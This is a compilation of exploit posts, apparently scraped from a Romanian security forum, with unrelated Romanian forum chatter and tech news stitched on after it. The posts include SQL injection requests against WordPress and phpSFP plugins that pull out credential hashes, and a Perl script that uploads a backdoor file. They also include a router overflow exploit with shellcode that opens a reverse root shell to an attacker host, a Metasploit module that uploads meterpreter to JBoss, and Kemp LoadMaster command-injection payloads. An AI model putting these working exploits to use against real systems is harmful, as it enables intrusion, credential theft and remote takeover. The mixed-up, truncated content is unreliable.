+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php +Vulnerable code: from line 225 to 255 case 'sam_ajax_load_combo_data': $page = $_GET['page']; $rows = $_GET['rows']; $searchTerm = $_GET['searchTerm']; $offset = ((int)$page - 1) * (int)$rows; $sql = "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug, wu.user_email AS email FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%' ORDER BY wu.id LIMIT $offset, $rows;"; $users = $wpdb->get_results($sql, ARRAY_A); $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';"; $rTotal = $wpdb->get_var($sql); $total = ceil((int)$rTotal/(int)$rows); $out = array( 'page' => $page, 'records' => count($users), 'rows' => $users, 'total' => $total, 'offset' => $offset ); break; ---SQL INJECTION 4--- + REQUEST POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 Host: hostname User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) ; wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align% 3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3 Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 73 action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE> + Vulnerable file: simple-ads-manager/sam-ajax-admin.php + Vulnerable code: from line 188 to 223 case 'sam_ajax_load_users': $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber'; $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor'; $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author'; $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor'; $roleAdministrator = (isset($_REQUEST["admin"])) ? urldecode($_REQUEST["admin"]) : 'Administrator'; $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin'; $sql = "SELECT wu.id, wu.display_name AS title, wu.user_nicename AS slug, (CASE wum.meta_value WHEN 0 THEN '$roleSubscriber' WHEN 1 THEN '$roleContributor' WHEN 2 THEN '$roleAuthor' ELSE IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor', IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator', IF(wum.meta_value > 10, '$roleSuperAdmin', NULL) ) ) END) AS role FROM $uTable wu INNER JOIN $umTable wum ON wu.id = wum.user_id AND wum.meta_key = '$userLevel' ORDER BY wu.id;"; $users = $wpdb->get_results($sql, ARRAY_A); $k = 0; foreach($users as &$val) { $k++; $val['recid'] = $k; } $out = $users; break; REFERENCE: + [url]https://www.youtube.com/watch?v=HPJ1r9dhIB4[/url] Best Regards ----------------------------------- ITAS Team ([url]www.itas.vn[/url]) Source

###################################################################### # Exploit Title: Wordpress PHP Event Calendar Plugin - Arbitrary File Upload # Google Dork: inurl:/plugins/php-event-calendar/ # Date: 02.04.2015 # Exploit Author: CrashBandicot (@DosPerl) # Source Plugin: https://wordpress.org/plugins/php-event-calendar/ # Vendor HomePage: http://phpeventcalendar.com/ # Version: 1.5 # Tested on: MSwin ###################################################################### # Path of File : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php # Vulnerable File : uploadify.php <?php /* Uploadify Copyright (c) 2012 Reactive Apps, Ronnie Garcia Released under the MIT License <http://www.opensource.org/licenses/mit-license.php> */ // Define a destination //$targetFolder = '/uploads'; // Relative to the root $targetFolder = $_POST['targetFolder']; // wp upload directory $dir = str_replace('\\','/',dirname(__FILE__)); //$verifyToken = md5('unique_salt' . $_POST['timestamp']); if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; //$targetPath = $dir.$targetFolder; $targetPath = $targetFolder; $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name']; $targetFile = rtrim($targetPath,'/') . '/' . $fileName; // Validate the file type $fileTypes = array('jpg','jpeg','gif','png'); // File extensions $fileParts = pathinfo($_FILES['Filedata']['name']); if (in_array($fileParts['extension'],$fileTypes)) { move_uploaded_file($tempFile,$targetFile); echo '1'; } else { echo 'Invalid file type.'; } } ?> # Exploit #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\t +===================================================\n"; print "\t | PHP event Calendar Plugin - Arbitrary File Upload \n"; print "\t | Author: CrashBandicot\n"; print "\t +===================================================\n\n"; die "usage : perl $0 backdoor.php.gif" unless $ARGV[0]; $file = $ARGV[0]; my $ua = LWP::UserAgent->new( agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},); my $ch = $ua->post("http://127.0.0.1/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content; if($ch = ~/1/) { print "\n [+] File Uploaded !"; } else { print "\n [-] Target not Vuln"; } __END__ # Path Shell : http://localhost/0day_backdoor.php.gif Source

#!/usr/bin/env python ##################################################################################### # Exploit for the AIRTIES Air5650v3TT # Spawns a reverse root shell # Author: Batuhan Burakcin # Contact: batuhan@bmicrosystems.com # Twitter: @batuhanburakcin # Web: [url]http://www.bmicrosystems.com[/url] ##################################################################################### import sys import time import string import socket, struct import urllib, urllib2, httplib if __name__ == '__main__': try: ip = sys.argv[1] revhost = sys.argv[2] revport = sys.argv[3] except: print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0] host = struct.unpack('>L',socket.inet_aton(revhost))[0] port = string.atoi(revport) shellcode = "" shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd" shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff" shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0" shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\xaf\xae\xff\xe4" shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27" shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27" shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c" shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f" shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec" shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab" shellcode += "\x01\x01\x01\x0c" data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48 pdata = { 'redirect' : data, 'self' : '1', 'user' : 'tanri', 'password' : 'ihtiyacmyok', 'gonder' : 'TAMAM' } login_data = urllib.urlencode(pdata) #print login_data url = 'http://%s/cgi-bin/login' % ip header = {} req = urllib2.Request(url, login_data, header) rsp = urllib2.urlopen(req) Source

# # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'JBoss Seam 2 File Upload and Execute', 'Description' => %q{ Versions of the JBoss Seam 2 framework < 2.2.1CR2 fails to properly sanitize inputs to some JBoss Expression Language expressions. As a result, attackers can gain remote code execution through the application server. This module leverages RCE to upload and execute a meterpreter payload. Versions of the JBoss AS admin-console are known to be vulnerable to this exploit, without requiring authentication. Tested against JBoss AS 5 and 6, running on Linux with JDKs 6 and 7. This module provides a more efficient method of exploitation - it does not loop to find desired Java classes and methods. NOTE: the check for upload success is not 100% accurate. NOTE 2: The module uploads the meterpreter JAR and a JSP to launch it. }, 'Author' => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ], 'References' => [ # JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs ['CVE', '2010-1871'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'], ['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'], ['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html'] ], 'DisclosureDate' => "Aug 05 2010", 'License' => MSF_LICENSE, 'Platform' => %w{ java }, 'Targets' => [ [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' }, ] ], 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(8080), OptString.new('AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]), OptString.new('CTYPE', [ true, "Content-Type to send with requests", "application/x-www-form-urlencoded"]), OptString.new('TARGETURI', [ true, "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]), OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]), OptString.new('FNAME', [ false, "Name of file to create - NO EXTENSION! (default: random)", nil]), OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]), ], self.class) end def check vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}" }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) vprint_debug("Server sent a 302 with location") if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29)) report_vuln({ :host => rhost, :port => rport, :name => "#{self.name} - #{uri}", :refs => self.references, :info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource." }) return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end else return Exploit::CheckCode::Unknown end # If we reach this point, we didn't find the service return Exploit::CheckCode::Unknown end def execute_cmd(cmd) cmd_to_run = Rex::Text.uri_encode(cmd) vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}" }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess)) vprint_status("#{rhost}:#{rport} Exploit successful") else vprint_status("#{rhost}:#{rport} Exploit failed.") end else vprint_status("#{rhost}:#{rport} Exploit failed.") end end def call_jsp(jspname) # TODO ugly way to strip off last resource on a path uri = target_uri.path *keep,ignore = uri.split(/\//) keep.push(jspname) uri = keep.join("/") uri = "/" + uri if (uri[0] != "/") res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "sessionid=" + Rex::Text.rand_text_alpha(32) }, timeout=datastore['TIMEOUT']) if (res and res.code == 200) vprint_status("Successful request to JSP") else vprint_error("Failed to request JSP") end end def upload_jsp(filename,jarname) jsp_text = <<EOJSP <%@ page import="java.io.*" %><%@ page import="java.net.*" %><% URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()}); Class c = cl.loadClass("metasploit.Payload"); c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]}); %> EOJSP vprint_status("Uploading JSP to launch payload") status = upload_file_chunk(filename,'false',jsp_text) if status vprint_status("JSP uploaded to to #{filename}") else vprint_error("Failed to upload file.") end @pl_sent = true end def upload_file_chunk(filename, append='false', chunk) # create URL-safe Base64-encoded version of chunk b64 = Rex::Text.encode_base64(chunk) b64 = b64.gsub("+","%2b") b64 = b64.gsub("/","%2f") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64 }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) # TODO Including the conversationId part in this regex might cause # failure on other Seam applications. Needs more testing if (res.headers['Location'] =~ %r(user=&conversationId)) #vprint_status("#{rhost}:#{rport} Exploit successful.") return true else #vprint_status("#{rhost}:#{rport} Exploit failed.") return false end else #vprint_status("#{rhost}:#{rport} Exploit failed.") return false end end def get_full_path(filename) #vprint_debug("Trying to find full path for #{filename}") uri = target_uri.path res = send_request_cgi( { 'uri' => normalize_uri(uri), 'method' => 'POST', 'ctype' => datastore['CTYPE'], 'agent' => datastore['AGENT'], 'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}" }, timeout=datastore['TIMEOUT']) if (res and res.code == 302 and res.headers['Location']) # the user argument should be set to the result of our call - which # will be the full path of our file matches = /.*user=(.+)\&.*/.match(res.headers['Location']) #vprint_debug("Location is " + res.headers['Location']) if (matches and matches.captures) return Rex::Text::uri_decode(matches.captures[0]) else return nil end else return nil end end def java_stager(fname, chunk_size) @payload_exe = fname + ".jar" jsp_name = fname + ".jsp" #data = payload.encoded_jar.pack data = payload.encoded_jar.pack append = 'false' while (data.length > chunk_size) status = upload_file_chunk(@payload_exe, append, data[0, chunk_size]) if status vprint_debug("Uploaded chunk") else vprint_error("Failed to upload chunk") break end data = data[chunk_size, data.length - chunk_size] # first chunk is an overwrite, afterwards, we need to append append = 'true' end status = upload_file_chunk(@payload_exe, 'true', data) if status vprint_status("Payload uploaded to " + @payload_exe) else vprint_error("Failed to upload file.") end # write a JSP that can call the payload in the jar upload_jsp(jsp_name, @payload_exe) pe_path = get_full_path(@payload_exe) || @payload_exe jsp_path = get_full_path(jsp_name) || jsp_name # try to clean up our stuff; register_files_for_cleanup(pe_path, jsp_path) # call the JSP to launch the payload call_jsp(jsp_name) end def exploit @pl_sent = false if check == Exploit::CheckCode::Vulnerable fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8)) vprint_status("#{rhost}:#{rport} Host is vulnerable") vprint_status("#{rhost}:#{rport} Uploading file...") # chunking code based on struts_code_exec_exception_delegator append = 'false' chunk_size = datastore['CHUNKSIZE'] # sanity check if (chunk_size <= 0) vprint_error("Invalid chunk size #{chunk_size}") return end vprint_debug("Sending in chunks of #{chunk_size}") case target['Platform'] when 'java' java_stager(fname, chunk_size) else fail_with(Failure::NoTarget, 'Unsupported target platform!') end handler end end end Source

# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS) # Date: 01 April 2015 # Author: Roberto Suggi Liverani # Software Link: http://kemptechnologies.com/load-balancer/ # Version: 7.1.16 and previous versions # Tested on: Kemp Load Master 7.1-16 # CVE : CVE-2014-5287/5288 Link: http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html Kemp virtual load master is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download By default, Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed in the post below can either be exploited attacking an authenticated user via CSRF or XSS based attacks. The following vulnerabilities were discovered when looking at Kemp Load Master v.7.1-16 and some of them should be fixed in the latest version (7.1-20b or later). Change logs of the fixed issues can be found at the following page: "PD-2183 Functions have been added to sanitize input in the WUI in order to resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288". Remote Code Execution - status: fixed in 7.1.20b (reported in June 2014) - CVE-2014-5287/5288 An interesting remote code execution vector can be found through the attack payload below: http://x.x.x.x/progs/fwaccess/add/1|command The web application functionality is based on multiple bash scripts contained in the /usr/wui/progs folder. The application is using CGI so that the scripts can handle HTTP requests. We notice that if the result of the command on line 285 is not positive (check on 286), then seterrmsg function is called. On line 318 we see a dangerous "eval" against our parameters. By simply attempting multiple characters, the seterrmsg function is invoked and returns plenty of interesting information: http://x.x.x.x/progs/fwaccess/add/1'ls Response: HTTP/1.1 200 OK Date: Sat, 27 Dec 2014 23:25:55 GMT Server: mini-http/1.0 (unix) Connection: close Content-Type: text/html /usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `'' /usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file line 318 contains an eval against the $@ (which contains our arguments). The arguments are passed via the fwaccess page, where IFS is set with a slash "/" separator. By attempting the request below, it is possible to achieve code execution: http://x.x.x.x/progs/fwaccess/add/1|ls Response: Line 120 and line 190 reports an integer expression expected error, as our argument is "1|ls" is obviously no longer an integer. However, the command execution works fine, as we are redirecting output through the pipe character and to "ls" command. The application is flawed in so many other points, also, via HTTP POST requests Other injection points that were found: Page: /progs/geoctrl/doadd Method: POST Parameter: fqdn Page: /progs/networks/hostname Method: POST Parameter: host Page: /progs/networks/servadd Method: POST Parameter: addr Page: /progs/useradmin/setopts Method: POST Parameter: xuser So how can we exploit all this goodness? CSRF (Cross Site Request Forgery) - status: not fixed - reported in June 2014 We can use another vulnerability, such as CSRF - most of the pages of the administrative are vulnerable to this attack, so even though a user is authenticated via Basic authentication, the forged request will force the browser to pass the credentials within the HTTP request. Interestingly enough, there are some kind of protections against CSRF for critical functions, such as factory reset, shutdown and reset. However, they are flawed as well, as the "magic" token matches with the unix epoch timestamp, so it is predictable and can be passed within the request. Reflected and Stored XSS - status: partially fixed - reported on June 2014 Another way to attack users is via XSS - in this case, we have plenty of options, as both reflected and stored XSS are there. For instance, a user might want to CSRF -> Store XSS -> BeEF just to achieve persistence. Reflected XSS was found on this point: Page: /progs/useradmin/setopts Method: POST Parameter: xuser Stored XSS was found on the following points: Page: /progs/geoctrl/doadd Method: POST Parameter: fqdn A further injection points: Page: /progs/fwaccess/add/0 Method: POST Parameter: comment Page: /progs/doconfig/setmotd Method: POST Parameter: BeEF Module As part of this research, I have developed a BeEF module to take advantage of chaining these vulnerabilities together. It is always sweet to use a XSS as a starting point to perform code execution against an appliance. The github pull request for the module can be found here: https://github.com/beefproject/beef/pull/1104/files For this module, I wanted to use the beef.net.forge_request() function, using a POST method, required to exploit the above RCE vector attacks. However, POST method was not usable at moment of writing this module and @antisnatchor was very quick to fix it in this case. So if you want to try it, ensure you have the latest version of BeEF installed. Extra - bonus Denial of Service - status: unknown - reported on June 2014 It appears the thc-ssl-dos tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same goes if a balanced service is using SSL via Kemp Load Master. Shell-shock - status: unknown - reported in 2015 Obviously, the application is not immune from the infamous shell-shock vulnerability. This was found by my friend Paul Heneghan and then by a user complaining on the vendor's blog (the comment has been removed shortly after). For those of you who are more curios, the shell-shock vulnerability works perfectly via the User-Agent header, also in version 7.1-18 and possibly on version 7.1-20 as well. Funny enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim here), if their main product is affected by so many critical vulnerabilities ;-) If you are keen for an extra-extra bonus, keep reading... Extra - extra bonus: No license, no web authentication However, most of the underlying functionality is still available and "attackable" without need of basic authentication. You can invalidate the license with a CSRF setting time far in the future ;-) Source

###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection (0-day) # Website : http://codecanyon.net/item/phpsfp-schedule-facebook-posts/5177393 # Exploit Author : @u0x (Pichaya Morimoto) # Release dates : April 2, 2015 # # Special Thanks to 2600 Thailand group: # xelenonz, pe3z, anidear, windows98se, icheernoom, penguinarmy # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ phpSFP – is a Platform where you can easily manage your scheduling for all your (Facebook) pages & groups in one place. It helps to send messages, ads, events, news and so on. phpSFP is pretty popular more than its sale record thanks to nulled group (underground WebApp license crackers). [+] Background <3 ============================================================ I managed to track down a group of Vietnam-based Facebook spammer which posted ads on many FB groups I'm joined. And ended up with a website that is modified version (all phpSFP credits are removed) of phpSFP 1.4.1. so I did some matching and found the original application is phpSFP. Guess what happens when spammer mess up with offsec guy [+] Exploit ============================================================ There are many possible ways to do SQLi, I will go with error-based which enabled by default on phpSFP xD $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,user())) or '1|||1" in case you don't know, for further queries you have to change 'user()' to something else, e.g. $ curl http://path.to.phpsfp/index.php/login -b "login=1|||1' or extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password) from users limit 1))) or '1|||2" don't forgot to do length()/substr() stuffs due to limitation of 32 characters in error message [+] Proof-of-Concept ============================================================ PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7 GET /index.php/login HTTP/1.1 Host: 192.168.33.103 Proxy-Connection: keep-alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8 Cookie: login=1|||1' or extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password) from users limit 1))) or '1|||2 HTTP/1.1 500 Internal Server Error Server: Apache/2.4.7 (Ubuntu) Date: Thu, 02 Apr 2015 13:15:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Set-Cookie: ci_session=<deducted>; expires=Sat, 01-Apr-2017 13:15:08 GMT; Max-Age=63072000; path=/ Content-Length: 838 <html> <head> <title>Database Error</title> <style type="text/css"> .... <h1>A Database Error Occurred</h1> <p>Error Number: 1105</p><p>XPATH syntax error: 'admin:f0250d9b38c974122119abf826'</p><p> .... [+] Vulnerability Analysis ============================================================ I have analyzed on 1.5.6 (lastest version) and 1.4.1 (a popular edition released by nulled group) The bug itself is quite interesting.. the author did well in login function but failed to parameterized/escape SQL query in 'remember me' function in authentication phrase. ; phpSFP 1.5.6 File: application/models/auth.php function cookie() { if(get_cookie('login')) <-- if 'login' cookie is setted { list($id_user, $password, $access) = explode("|||", get_cookie('login')); <-- split by ||| // the magic happens here $qusers = $this->db->query("SELECT id FROM users WHERE id='".$id_user."' AND password='".$password."'"); ; phpSFP 1.4.1, same thing but in different file File: application/controllers/login.php public function index() { if(get_cookie('login')) <-- if 'login' cookie is setted { list($id_user, $password, $access) = explode("|||", get_cookie('login')); <-- split by ||| // the magic happens here $qusers = $this->db->query("SELECT id FROM users WHERE id='".$id_user."' AND password='".$password."'"); Source

Ma acum sincer sa fiu omul este ok ( are si el momente ) ( nu am fost niciodata "fan,, si nici nu l-am pupat in c*r) dar e chiar aiurea sa atacati omul degeaba ( pentru cei care il jignesc: ar fi ok ca toti astia care il jigniti sa aveti macar aceleasi cunostiinte ca el in domeniu IT) dar cand apari tu ca un simplu user cu 10 posturi care nu ai facut niciodata nimic pentru comunitate si zici "m*&e tinkode,, e chiar penibil. Majoritatea care sunt pe forum doar sa faca "atacuri la persoane" se recunosc usor si cel mai bine ca sa scapi de persoanele de genul este sa le ignori ( cu timpul vor inceta, cat o sa o tina cu atacurile? 1 luna / 1 / 2 /3 ani ).

@tqcsu, da am citit si eu zic ca se incadreaza la offtopic fiindca sunt incepatori ce vin pe RST. Asta e pentru "publicul" mai nou de pe RST.

Breaking news!!! Martorii spun ca polonic a fost vazuta alergandu-l pe satana cu furca lui. Un paparazzo era sa moara in timp ce a facut poza!

CEO-ul BlackBerry a declarat, recent, ca producatorul canadian nu vrea sa faca exit de pe piata device-urilor, insa pana la o eventuala revenire pe profit a diviziei, compania va pune accent pe solutii de securitate dedicate segmentului enterprise si guvernamental. Blackberry a preluat, anul trecut, in iulie, compania Secusmart, implicit tehnologia de criptare cu acelasi nume, iar acum avem si o prima implementare a solutiei intr-un device. Vorbim despre o tableta bazata pe Samsung Galaxy Tab S 10.5 care a primit un tratament de securitate concentrat pe criptarea datelor si a comunicatiilor. Pe langa prezentarea generala a tabletei, eveniment care s-a desfasurat in prima zi a expozitiei de tehnologie CeBIT 2015 de la Hanovra (15 - 20 martie), reprezentantii Blackberry au anuntat si adoptarea tehnologiei de catre guvernele Canadei si Germaniei, semn ca producatorul mai are un cuvant de spus in acest domeniu. Dupa cum spuneam mai sus, SecuTABLET este, practic, un Samsung Galaxy Tab S 10.5 (despre specificatiile hadrware ale dispozitivului puteti citi AICI) ce ofera mai multe profiluri de lucru, precum personal si profesional, ambele fiind securizate impotriva accesului neautorizat. Potrivit The Wall Street Journal, SecuTABLET va costa 2380 de dolari. Ce sanse exista, insa, ca Blackberry sa revina cu un produs propriu pe piata tabletelor, dupa esecul PlayBook? CEO-ul companiei, John Chen, nu exclude posbilitatea reintrarii Blackberry pe acest segment, dar acest lucru se va intampla doar daca producatorul va reusi sa propuna conusmatorilor un de vice "iconic", diferit de orice exista in acest moment pe piata. Source

La serviciu, angajatii deschid uneori fisiere malitioase, stau in unele zile prea mult pe Facebook si nu sunt multumiti cand IT-istii le impun restrictii de tot felul. Pentru companii nu e usor sa gaseasca un echilibru intre nevoia de a mentine sisteme informatice sigure si dorinta angajatilor de a se relaxa in scurtele pauze si de a-si folosi si terminalele personale cu care sunt obisnuiti. Despre sursa tensiunilor dintre IT-isti si ceilalti angajati, dar si despre de ce nu e bine ca Facebook sa fie interzis la locul de munca, puteti citi in articol. De ce departamentul de IT este uneori dispretuit Din pacate, in multe companii departamentul de IT nu este bine vazut, in unele cazuri fiind chiar dispretuit, desi fara IT-isti activitatea companiei ar fi imposibila. Cand ceva nu merge, IT-istii sunt printre primii invinuiti, cand totul merge "struna" ei rar sunt laudati. De foarte multe ori sunt vazuti ca oameni aroganti care traiesc printre cabluri si cearta angajatii, insa explicatia acestei stari de fapt tine de mai multe lucruri. Antipatia dintre IT-isti si angajatii de la celelalte departamente ale unei mari companii se poate instala fara sa fie vina IT-istilor sau a altor angajati, ci pur si simplu pot sa fie responsabile procedurile birocratice instituite de management. Daca, spre exemplu, pentru repararea unui desktop cu probleme e nevoie de multe aprobari, angajatul va astepta mult pana la efectuarea reparatiei si va considera pe nedrept ca departamentul de IT e greoi ca actiune. Un angajat care vrea sa instaleze o aplicatie pe PC-ul din birou ar putea astepta cateva saptamani pana sa primeasca aprobarea oficiala si va fi frustrat ca nu poate, precum acasa, sa-si instaleze singur soft-ul. Relatiile tensionate sunt intretinute si de faptul ca departamentul IT trebuie de multe ori sa spuna “NU” in fata cererilor venite din alte departamente, fie ca e vorba de dreptul de a instala anumite aplicatii sau de a face diverse improvizatii. IT-istii refuza multe solicitari fie din motive de securitate informatica, fie din motive financiare (compania nu vrea sa aloce in buget bani pentru aparatura IT scumpa). In acest context, IT-istii sunt vazuti de multi angajatii ca fiind o bariera, iar cand apar probleme pe PC-uri, multi dintre angajati prefera sa incerce sa le rezolve singuri, cautand eventual sfaturi pe forum-uri. Bineinteles ca de multe ori aceste 